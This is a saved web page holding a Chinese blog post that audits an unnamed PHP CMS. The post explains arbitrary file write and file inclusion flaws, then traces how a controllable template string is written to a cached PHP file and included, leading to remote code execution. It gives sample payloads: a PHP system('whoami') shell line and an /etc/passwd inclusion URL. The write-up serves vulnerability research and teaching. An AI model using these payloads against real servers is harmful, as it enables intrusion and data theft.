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
|
|||
|
|
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<!--[if !IE]> -->
|
|||
|
|
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAADDUExURUxpcVVVVUNDVT5CTz1BUEBVVT1BUD1BTz5CTz5GT0BDUVVVVT5CTz5BUj1CTz5BT05OYj1CUD5GVUJCUj5CUD5BTz5BT0lJbT5CUEJCVT9DUUBHVT5CUD5CTz9CUD5BTz1BTz5CUEREUz5CUD5BUD5DTz5CUD5BT0BDUT5CTz1CUD5EUUBgYEBDUT5CUT1CTz1BUD5BUD9DUT1CT0REVT5BUENDUT1BUEBGUz1BUD9DT0FBUz1CTz5BTz1CUD1BUD1BT5JdbS4AAABAdFJOUwAJKr76DPbywR1MBuRO5fsNsyEfvdtKB4MbfiTa+FnegYwitbBXfPdYrt0pCEiL9XmsRdgeVhO8KI2KK45a2b/ePQx7AAAAwUlEQVQ4y4XTxw7CQAwE0A2E0BN67733Xv3/X4U0kYgimKxP9vgdfNhVildaBVfmpQGPaPD+7mjAW74g5q8Ewqd4QHy1T+JCm4IdsqswsEUUchhYHxCFhYENkpYw0MCFEZuCJYKuMDB1LzQZsPLehX/BCONEGCiWcWGKghKmlTAwwDA3GbByGArCQA39UBiYLfwX/gD3mdyEgSy6i8nAuIfuLAx00ByFgbaB5hT3VdUDmk8mfc0fa9Y1oKLZKyNo+QEJQV3gLnHrKwAAAABJRU5ErkJggg==" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15830?u_atoken=f330060ee4225701e6e43c910d4b7ef5&u_asig=1a0c399a17289064256973494e003b"><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
|
|||
|
|
<body>
|
|||
|
|
<div class="navbar navbar-default">
|
|||
|
|
<div class=navbar-inner>
|
|||
|
|
<div class=container style=text-align:center;position:relative>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
|
|||
|
|
<![endif]-->
|
|||
|
|
<div class=brand-box>
|
|||
|
|
<a class=brand href=https://xz.aliyun.com/tab/1></a>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15830&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
|
|||
|
|
登录</a>
|
|||
|
|
|
|||
|
|
<div class="nav-collapse collapse">
|
|||
|
|
<div class="search d1 text-right">
|
|||
|
|
<form action=/search>
|
|||
|
|
<input type=text placeholder=搜索 name=keyword value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div id=Wrapper class=container>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class=row2>
|
|||
|
|
<div class=span10>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box content" width="1200px !important" style=width:1200px>
|
|||
|
|
|
|||
|
|
<div class=box-container>
|
|||
|
|
<div class=main-topic>
|
|||
|
|
<div class="clearfix user-info topic-list">
|
|||
|
|
<p><span class=content-title>记一次某CMS审计</span>
|
|||
|
|
</p>
|
|||
|
|
<div class=topic-info>
|
|||
|
|
<span class=info-left>
|
|||
|
|
<a href=https://xz.aliyun.com/u/81222>
|
|||
|
|
<span class="username cell"> PumpkinBridge</span></a> <span class=i-seprator> / </span>
|
|||
|
|
<span> 2024-10-12 11:18:05</span><span class=i-seprator> / </span>
|
|||
|
|
|
|||
|
|
<span>发表于摩尔多瓦 / </span>
|
|||
|
|
|
|||
|
|
<span>浏览数 10</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=content-node>
|
|||
|
|
|
|||
|
|
<span class="label label-default label-node-first">
|
|||
|
|
<a href=https://xz.aliyun.com/tab/4>社区板块</a></span>
|
|||
|
|
<span class="label label-default">
|
|||
|
|
<a href=https://xz.aliyun.com/node/1>漏洞分析</a></span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
|
|||
|
|
顶(0)</a>
|
|||
|
|
<a class="vote vote-down" href=javascript:void(0)>
|
|||
|
|
踩(0)</a></span>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<hr>
|
|||
|
|
<div id=topic_content class="topic-content markdown-body">
|
|||
|
|
<h1 id=toc-0>介绍</h1>
|
|||
|
|
<p>某CMS系统,采用PHP5+MYSQL做为技术基础进行开发。采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。</p>
|
|||
|
|
<h1 id=toc-1>引言</h1>
|
|||
|
|
<p>某次挖掘src的时候碰到了该系统,网上关于这个系统的漏洞信息不是很多,由于是开源的CMS系统,就去官网下载了一套最新版尝试审计,关键部分可能会进行模糊处理,主要是分享一下自己代码审计的过程,希望各位大佬理解,勿喷/(ㄒoㄒ)/~~,文章同时会涉及一些比较基础的漏洞原理和方法,方便各大读者理解</p>
|
|||
|
|
<h1 id=toc-2>任意文件写入漏洞</h1>
|
|||
|
|
<p>先来了解一下任意文件写入漏洞的概念</p>
|
|||
|
|
<h2 id=toc-3>定义:</h2>
|
|||
|
|
<p>任意文件写入漏洞是指攻击者能够在目标服务器上任意位置创建或修改文件的漏洞。通常发生在应用程序对文件路径或文件内容的输入缺乏适当的验证或过滤时。这个漏洞可能导致严重的后果,尤其是当攻击者能够向服务器写入包含恶意代码的文件时。</p>
|
|||
|
|
<h2 id=toc-4>风险:</h2>
|
|||
|
|
<p>远程代码执行:如果攻击者可以将恶意代码(如 PHP 代码)写入服务器上的文件,然后通过某种方式触发该文件的执行(例如通过文件包含漏洞),攻击者便可以控制服务器。<br>
|
|||
|
|
破坏系统完整性:攻击者可以覆盖系统的关键文件,导致系统崩溃或篡改数据。<br>
|
|||
|
|
植入后门:通过写入恶意程序,攻击者可以持续性地访问受害服务器。</p>
|
|||
|
|
<h2 id=toc-5>例子:</h2>
|
|||
|
|
<p>如果有如下代码:</p>
|
|||
|
|
<pre><code>file_put_contents('/var/www/html/uploads/malicious.php', $user_input);</code></pre>
|
|||
|
|
<p>攻击者通过 <code>$user_input</code> 传递恶意代码 <code><?php system('whoami'); ?></code>,将会在服务器上创建一个 <code>malicious.php</code> 文件,里面包含可以执行系统命令的代码。之后,攻击者只需访问该文件,服务器便会执行文件中的恶意代码。</p>
|
|||
|
|
<h1 id=toc-6>文件包含漏洞</h1>
|
|||
|
|
<h2 id=toc-7>定义:</h2>
|
|||
|
|
<p>文件包含漏洞发生在应用程序允许用户通过输入控制包含的文件路径,从而让服务器执行用户指定的文件。该漏洞通常出现在使用 include、require、include_once 或 require_once 等 PHP 函数的地方。</p>
|
|||
|
|
<h2 id=toc-8>文件包含漏洞分为两种类型:</h2>
|
|||
|
|
<p>本地文件包含 (Local File Inclusion, LFI):攻击者可以包含服务器上存在的本地文件。<br>
|
|||
|
|
远程文件包含 (Remote File Inclusion, RFI):攻击者可以包含远程服务器上的文件(取决于服务器的配置是否允许)。</p>
|
|||
|
|
<h2 id=toc-9>风险:</h2>
|
|||
|
|
<p>任意代码执行:通过文件包含漏洞,攻击者可以执行服务器上已有的文件中的代码,或者结合任意文件写入漏洞,执行自己上传的恶意文件。<br>
|
|||
|
|
信息泄露:通过包含服务器上的敏感文件(如 /etc/passwd、配置文件等),攻击者可以获取系统的重要信息。</p>
|
|||
|
|
<h2 id=toc-10>例子:</h2>
|
|||
|
|
<p>假设有如下代码:</p>
|
|||
|
|
<pre><code>include $_GET['file'];</code></pre>
|
|||
|
|
<p>攻击者通过 <code>http://example.com/page.php?file=/etc/passwd</code>,可以让服务器读取并显示 <code>Linux</code> 系统中的用户列表(<code>/etc/passwd</code> 文件)。<br>
|
|||
|
|
如果结合任意文件写入漏洞,攻击者可以上传一个恶意文件,然后通过文件包含漏洞让服务器执行这个恶意文件,从而实现远程代码执行。</p>
|
|||
|
|
<h1 id=toc-11>常见的危险函数</h1>
|
|||
|
|
<p><code>include()</code><br>
|
|||
|
|
<code>require()</code><br>
|
|||
|
|
<code>include_once() / require_once()</code> 只被包含一次<br>
|
|||
|
|
<code>readfile()</code><br>
|
|||
|
|
<code>parse_ini_file()</code></p>
|
|||
|
|
<h1 id=toc-12>代码分析</h1>
|
|||
|
|
<p>这里我们定位到某php文件,<code>$str</code>是可控的,而且能控制 <code>$template</code> 或 <code>$id</code>,可以通过<code>file_put_contents()</code>写入恶意代码到服务器上的 PHP 文件中。写入的文件通过<code>include $filepath</code>被直接执行,如果文件内容包含恶意 PHP 代码,就可以实现RCE。</p>
|
|||
|
|
<pre><code>$tpl = pc_base::load_sys_class('template_cache');
|
|||
|
|
$str = $tpl->template_parse(new_stripslashes($template));
|
|||
|
|
$filepath = CACHE_PATH.'caches_template'.DIRECTORY_SEPARATOR.'block'.DIRECTORY_SEPARATOR.'tmp_'.$id.'.php';
|
|||
|
|
$dir = dirname($filepath);
|
|||
|
|
if(!is_dir($dir)) {
|
|||
|
|
@mkdir($dir, 0777, true);
|
|||
|
|
}
|
|||
|
|
if (@file_put_contents($filepath, $str)) {
|
|||
|
|
ob_start();
|
|||
|
|
include $filepath;
|
|||
|
|
$html = ob_get_contents();
|
|||
|
|
ob_clean();
|
|||
|
|
@unlink($filepath);
|
|||
|
|
}</code></pre>
|
|||
|
|
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20241012104440-ee0236f8-8843-1.png title><img src=data:image/png;base64,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
|
|||
|
|
接下来我们跟进这个<code>$str</code>中的<code>$template</code>怎么实现,往上看<br>
|
|||
|
|
<a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20241012104806-686e8946-8844-1.png><img src="data:image/png;base64,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